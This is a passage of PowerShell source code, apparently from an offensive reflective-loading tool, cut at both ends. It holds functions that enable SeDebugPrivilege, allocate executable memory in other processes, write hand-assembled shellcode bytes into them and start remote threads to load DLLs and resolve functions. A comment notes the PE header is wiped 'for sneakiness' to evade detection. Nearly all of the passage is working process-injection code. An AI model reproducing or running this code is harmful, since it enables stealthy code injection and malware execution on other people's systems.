Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants\n\t\t)\n\t\t\n\t\t[IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke()\n\t\tif ($ThreadHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to get the handle to the current thread\"\n\t\t}\n\t\t\n\t\t[IntPtr]$ThreadToken = [IntPtr]::Zero\n\t\t[Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n\t\tif ($Result -eq $false)\n\t\t{\n\t\t\t$ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\t\t\tif ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)\n\t\t\t{\n\t\t\t\t$Result = $Win32Functions.ImpersonateSelf.Invoke(3)\n\t\t\t\tif ($Result -eq $false)\n\t\t\t\t{\n\t\t\t\t\tThrow \"Unable to impersonate self\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n\t\t\t\tif ($Result -eq $false)\n\t\t\t\t{\n\t\t\t\t\tThrow \"Unable to OpenThreadToken.\"\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tThrow \"Unable to OpenThreadToken. Error code: $ErrorCode\"\n\t\t\t}\n\t\t}\n\t\t\n\t\t[IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))\n\t\t$Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, \"SeDebugPrivilege\", $PLuid)\n\t\tif ($Result -eq $false)\n\t\t{\n\t\t\tThrow \"Unable to call LookupPrivilegeValue\"\n\t\t}\n\n\t\t[UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)\n\t\t[IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)\n\t\t$TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES)\n\t\t$TokenPrivileges.PrivilegeCount = 1\n\t\t$TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID)\n\t\t$TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true)\n\n\t\t$Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)\n\t\t$ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value\n\t\tif (($Result -eq $false) -or ($ErrorCode -ne 0))\n\t\t{\n\t\t\t#Throw \"Unable to call AdjustTokenPrivileges. Return value: $Result, Errorcode: $ErrorCode\"   #todo need to detect if already set\n\t\t}\n\t\t\n\t\t[System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)\n\t}\n\t\n\t\n\tFunction Invoke-CreateRemoteThread\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$ProcessHandle,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$StartAddress,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $false)]\n\t\t[IntPtr]\n\t\t$ArgumentPtr = [IntPtr]::Zero,\n\t\t\n\t\t[Parameter(Position = 4, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions\n\t\t)\n\t\t\n\t\t[IntPtr]$RemoteThreadHandle = [IntPtr]::Zero\n\t\t\n\t\t$OSVersion = [Environment]::OSVersion.Version\n\t\t#Vista and Win7\n\t\tif (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2)))\n\t\t{\n\t\t\tWrite-Verbose \"Windows Vista/7 detected, using NtCreateThreadEx. Address of thread: $StartAddress\"\n\t\t\t$RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)\n\t\t\t$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\t\t\tif ($RemoteThreadHandle -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError\"\n\t\t\t}\n\t\t}\n\t\t#XP/Win8\n\t\telse\n\t\t{\n\t\t\tWrite-Verbose \"Windows XP/8 detected, using CreateRemoteThread. Address of thread: $StartAddress\"\n\t\t\t$RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero)\n\t\t}\n\t\t\n\t\tif ($RemoteThreadHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tWrite-Verbose \"Error creating remote thread, thread handle is null\"\n\t\t}\n\t\t\n\t\treturn $RemoteThreadHandle\n\t}\n\n\t\n\n\tFunction Get-ImageNtHeaders\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$PEHandle,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types\n\t\t)\n\t\t\n\t\t$NtHeadersInfo = New-Object System.Object\n\t\t\n\t\t#Normally would validate DOSHeader here, but we did it before this function was called and then destroyed 'MZ' for sneakiness\n\t\t$dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)\n\n\t\t#Get IMAGE_NT_HEADERS\n\t\t[IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew))\n\t\t$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr\n\t\t$imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)\n\t\t\n\t\t#Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen.\n\t    if ($imageNtHeaders64.Signature -ne 0x00004550)\n\t    {\n\t        throw \"Invalid IMAGE_NT_HEADER signature.\"\n\t    }\n\t\t\n\t\tif ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')\n\t\t{\n\t\t\t$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64\n\t\t\t$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)\n\t\t\t$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32\n\t\t\t$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false\n\t\t}\n\t\t\n\t\treturn $NtHeadersInfo\n\t}\n\n\n\t#This function will get the information needed to allocated space in memory for the PE\n\tFunction Get-PEBasicInfo\n\t{\n\t\tParam(\n\t\t[Parameter( Position = 0, Mandatory = $true )]\n\t\t[Byte[]]\n\t\t$PEBytes,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types\n\t\t)\n\t\t\n\t\t$PEInfo = New-Object System.Object\n\t\t\n\t\t#Write the PE to memory temporarily so I can get information from it. This is not it's final resting spot.\n\t\t[IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null\n\t\t\n\t\t#Get NtHeadersInfo\n\t\t$NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types\n\t\t\n\t\t#Build a structure with the information which will be needed for allocating memory and writing the PE to memory\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)\n\t\t\n\t\t#Free the memory allocated above, this isn't where we allocate the PE to memory\n\t\t[System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes)\n\t\t\n\t\treturn $PEInfo\n\t}\n\n\n\t#PEInfo must contain the following NoteProperties:\n\t#\tPEHandle: An IntPtr to the address the PE is loaded to in memory\n\tFunction Get-PEDetailedInfo\n\t{\n\t\tParam(\n\t\t[Parameter( Position = 0, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$PEHandle,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants\n\t\t)\n\t\t\n\t\tif ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tthrow 'PEHandle is null or IntPtr.Zero'\n\t\t}\n\t\t\n\t\t$PEInfo = New-Object System.Object\n\t\t\n\t\t#Get NtHeaders information\n\t\t$NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types\n\t\t\n\t\t#Build the PEInfo object\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)\n\t\t\n\t\tif ($PEInfo.PE64Bit -eq $true)\n\t\t{\n\t\t\t[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))\n\t\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr\n\t\t}\n\t\telse\n\t\t{\n\t\t\t[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))\n\t\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr\n\t\t}\n\t\t\n\t\tif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL)\n\t\t{\n\t\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL'\n\t\t}\n\t\telseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE)\n\t\t{\n\t\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE'\n\t\t}\n\t\telse\n\t\t{\n\t\t\tThrow \"PE file is not an EXE or DLL\"\n\t\t}\n\t\t\n\t\treturn $PEInfo\n\t}\n\t\n\t\n\tFunction Import-DllInRemoteProcess\n\t{\n\t\tParam(\n\t\t[Parameter(Position=0, Mandatory=$true)]\n\t\t[IntPtr]\n\t\t$RemoteProcHandle,\n\t\t\n\t\t[Parameter(Position=1, Mandatory=$true)]\n\t\t[IntPtr]\n\t\t$ImportDllPathPtr\n\t\t)\n\t\t\n\t\t$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t\n\t\t$ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)\n\t\t$DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1)\n\t\t$RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\tif ($RImportDllPathPtr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to allocate memory in the remote process\"\n\t\t}\n\n\t\t[UIntPtr]$NumBytesWritten = [UIntPtr]::Zero\n\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten)\n\t\t\n\t\tif ($Success -eq $false)\n\t\t{\n\t\t\tThrow \"Unable to write DLL path to remote process memory\"\n\t\t}\n\t\tif ($DllPathSize -ne $NumBytesWritten)\n\t\t{\n\t\t\tThrow \"Didn't write the expected amount of bytes when writing a DLL path to load to the remote process\"\n\t\t}\n\t\t\n\t\t$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")\n\t\t$LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"LoadLibraryA\") #Kernel32 loaded to the same address for all processes\n\t\t\n\t\t[IntPtr]$DllAddress = [IntPtr]::Zero\n\t\t#For 64bit DLL's, we can't use just CreateRemoteThread to call LoadLibrary because GetExitCodeThread will only give back a 32bit value, but we need a 64bit address\n\t\t#\tInstead, write shellcode while calls LoadLibrary and writes the result to a memory address we specify. Then read from that memory once the thread finishes.\n\t\tif ($PEInfo.PE64Bit -eq $true)\n\t\t{\n\t\t\t#Allocate memory for the address returned by LoadLibraryA\n\t\t\t$LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\t\tif ($LoadLibraryARetMem -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Unable to allocate memory in the remote process for the return value of LoadLibraryA\"\n\t\t\t}\n\t\t\t\n\t\t\t\n\t\t\t#Write Shellcode to the remote process which will call LoadLibraryA (Shellcode: LoadLibraryA.asm)\n\t\t\t$LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)\n\t\t\t$LoadLibrarySC2 = @(0x48, 0xba)\n\t\t\t$LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba)\n\t\t\t$LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t\t\n\t\t\t$SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3)\n\t\t\t$SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)\n\t\t\t$SCPSMemOriginal = $SCPSMem\n\t\t\t\n\t\t\tWrite-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length)\n\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false)\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\tWrite-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length)\n\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false)\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\tWrite-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length)\n\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false)\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\tWrite-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length)\n\n\t\t\t\n\t\t\t$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\tif ($RSCAddr -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Unable to allocate memory in the remote process for shellcode\"\n\t\t\t}\n\t\t\t\n\t\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)\n\t\t\tif (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))\n\t\t\t{\n\t\t\t\tThrow \"Unable to write shellcode to remote process memory.\"\n\t\t\t}\n\t\t\t\n\t\t\t$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions\n\t\t\t$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\t\tif ($Result -ne 0)\n\t\t\t{\n\t\t\t\tThrow \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t\t}\n\t\t\t\n\t\t\t#The shellcode writes the DLL address to memory in the remote process at address $LoadLibraryARetMem, read this memory\n\t\t\t[IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t\t$Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)\n\t\t\tif ($Result -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Call to ReadProcessMemory failed\"\n\t\t\t}\n\t\t\t[IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])\n\n\t\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t}\n\t\telse\n\t\t{\n\t\t\t[IntPtr]$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions\n\t\t\t$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\t\tif ($Result -ne 0)\n\t\t\t{\n\t\t\t\tThrow \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t\t}\n\t\t\t\n\t\t\t[Int32]$ExitCode = 0\n\t\t\t$Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode)\n\t\t\tif (($Result -eq 0) -or ($ExitCode -eq 0))\n\t\t\t{\n\t\t\t\tThrow \"Call to GetExitCodeThread failed\"\n\t\t\t}\n\t\t\t\n\t\t\t[IntPtr]$DllAddress = [IntPtr]$ExitCode\n\t\t}\n\t\t\n\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\n\t\treturn $DllAddress\n\t}\n\t\n\t\n\tFunction Get-RemoteProcAddress\n\t{\n\t\tParam(\n\t\t[Parameter(Position=0, Mandatory=$true)]\n\t\t[IntPtr]\n\t\t$RemoteProcHandle,\n\t\t\n\t\t[Parameter(Position=1, Mandatory=$true)]\n\t\t[IntPtr]\n\t\t$RemoteDllHandle,\n\t\t\n\t\t[Parameter(Position=2, Mandatory=$true)]\n\t\t[String]\n\t\t$FunctionName\n\t\t)\n\n\t\t$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t$FunctionNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($FunctionName)\n\t\t\n\t\t#Write FunctionName to memory (will be used in GetProcAddress)\n\t\t$FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1)\n\t\t$RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\tif ($RFuncNamePtr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to allocate memory in the remote process\"\n\t\t}\n\n\t\t[UIntPtr]$NumBytesWritten = [UIntPtr]::Zero\n\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten)\n\t\t[System.Runtime.InteropServices.Marshal]::FreeHGlobal($FunctionNamePtr)\n\t\tif ($Success -eq $false)\n\t\t{\n\t\t\tThrow \"Unable to write DLL path to remote process memory\"\n\t\t}\n\t\tif ($FunctionNameSize -ne $NumBytesWritten)\n\t\t{\n\t\t\tThrow \"Didn't write the expected amount of bytes when writing a DLL path to load to the remote process\"\n\t\t}\n\t\t\n\t\t#Get address of GetProcAddress\n\t\t$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")\n\t\t$GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"GetProcAddress\") #Kernel32 loaded to the same address for all processes\n\n\t\t\n\t\t#Allocate memory for the address returned by GetProcAddress\n\t\t$GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\tif ($GetProcAddressRetMem -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to allocate memory in the remote process for the return value of GetProcAddress\"\n\t\t}\n\t\t\n\t\t\n\t\t#Write Shellcode to the remote process which will call GetProcAddress\n\t\t#Shellcode: GetProcAddress.asm\n\t\t#todo: need to have detection for when to get by ordinal\n\t\t[Byte[]]$GetProcAddressSC = @()\n\t\tif ($PEInfo.PE64Bit -eq $true)\n\t\t{\n\t\t\t$GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)\n\t\t\t$GetProcAddressSC2 = @(0x48, 0xba)\n\t\t\t$GetProcAddressSC3 = @(0x48, 0xb8)\n\t\t\t$GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9)\n\t\t\t$GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8)\n\t\t\t$GetProcAddressSC2 = @(0xb9)\n\t\t\t$GetProcAddressSC3 = @(0x51, 0x50, 0xb8)\n\t\t\t$GetProcAddressSC4 = @(0xff, 0xd0, 0xb9)\n\t\t\t$GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t}\n\t\t$SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4)\n\t\t$SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)\n\t\t$SCPSMemOriginal = $SCPSMem\n\t\t\n\t\tWrite-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false)\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\tWrite-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false)\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\tWrite-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false)\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\tWrite-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false)\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\tWrite-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length)\n\t\t\n\t\t$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\tif ($RSCAddr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to allocate memory in the remote process for shellcode\"\n\t\t}\n\t\t\n\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)\n\t\tif (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))\n\t\t{\n\t\t\tThrow \"Unable to write shellcode to remote process memory.\"\n\t\t}\n\t\t\n\t\t$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions\n\t\t$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\tif ($Result -ne 0)\n\t\t{\n\t\t\tThrow \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t}\n\t\t\n\t\t#The process address is written to memory in the remote process at address $GetProcAddressRetMem, read this 